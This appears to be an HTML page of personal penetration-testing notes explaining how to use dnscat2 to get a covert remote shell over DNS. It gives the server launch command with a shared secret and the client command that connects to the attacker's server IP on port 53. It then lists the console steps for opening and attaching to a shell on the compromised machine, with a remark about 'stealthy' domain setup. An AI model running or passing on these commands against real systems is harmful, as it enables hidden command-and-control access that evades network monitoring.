<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>DNSCat</title>
</head><body><b><u>First we need to set up a server</u></b><br/>
<br/>
Download the github repo for DNSCat<br/>
<br/>
https://github.com/iagox86/dnscat2<br/>
<br/>
or <br/>
<br/>
git clone https://github.com/iagox86/dnscat2.git<br/>
<br/>
<u><b>Server Side<br/>
<br/>
</b></u>Make sure that either your domain is set up (stealthy) or you have all your port forwarding set up to get connections from the outside world<br/>
<br/>
root@kali# ruby2.5 dnscat2.rb --secret 752891347958625<br/>
<br/>
MAKE SURE THAT YOU ARE NOT USING OLD FUCKING RUBY - IT WILL THROW ERRORS - Ruby 2.3 and 2.5 work. AND ALSO MAKE SURE YOU ARE IN THE SERVER DIRECTORY, EXECUTING THE SERVER RUBY SCRIPT, E.G., <span style="color: #ff0000">/pentest/pivoting/dnscat2/server/dnscat2.rb<br/>
</span><span style="color: #ff0000"><br/>
</span>Once a connection is made, <br/>
<br/>
Type the command "windows" --without the quote. &nbsp;This will show all open windows.<br/>
<br/>
Now type in "window 1" window 1 will be the very first window you get after the initial connection to the client from the server AKA attacker machine<br/>
<br/>
Now when in "window 1", type the command "shell" <br/>
<br/>
Now press ctrl + z and this will take you back to the main screen.<br/>
<br/>
Once in the main screen, type the command "windows" and you should see a list of windows. &nbsp;The window that says something like "<span style="color: #ff0000">4 :: sh (thp3) [encrypted and verified] [*]</span>"<br/>
<br/>
In this instance 4 is the window and sh is the fact I am running a shell on the box.<br/>
<br/>
type window -i 4<br/>
<br/>
Now you have shell access through DNS :):):):)<br/>
<br/>
<br/>
<span style="color: #ff0000"><br/>
<br/>
</span><b><u>Client Side<br/>
<br/>
</u></b>For the client side, execute the following, replace the x.x.x.x with your server IP address, or domain name.<br/>
<br/>
dnscat --dns server=x.x.x.x,port=53 --secret=752891347958625<br/>
<br/>
windows<br/>
</body></html>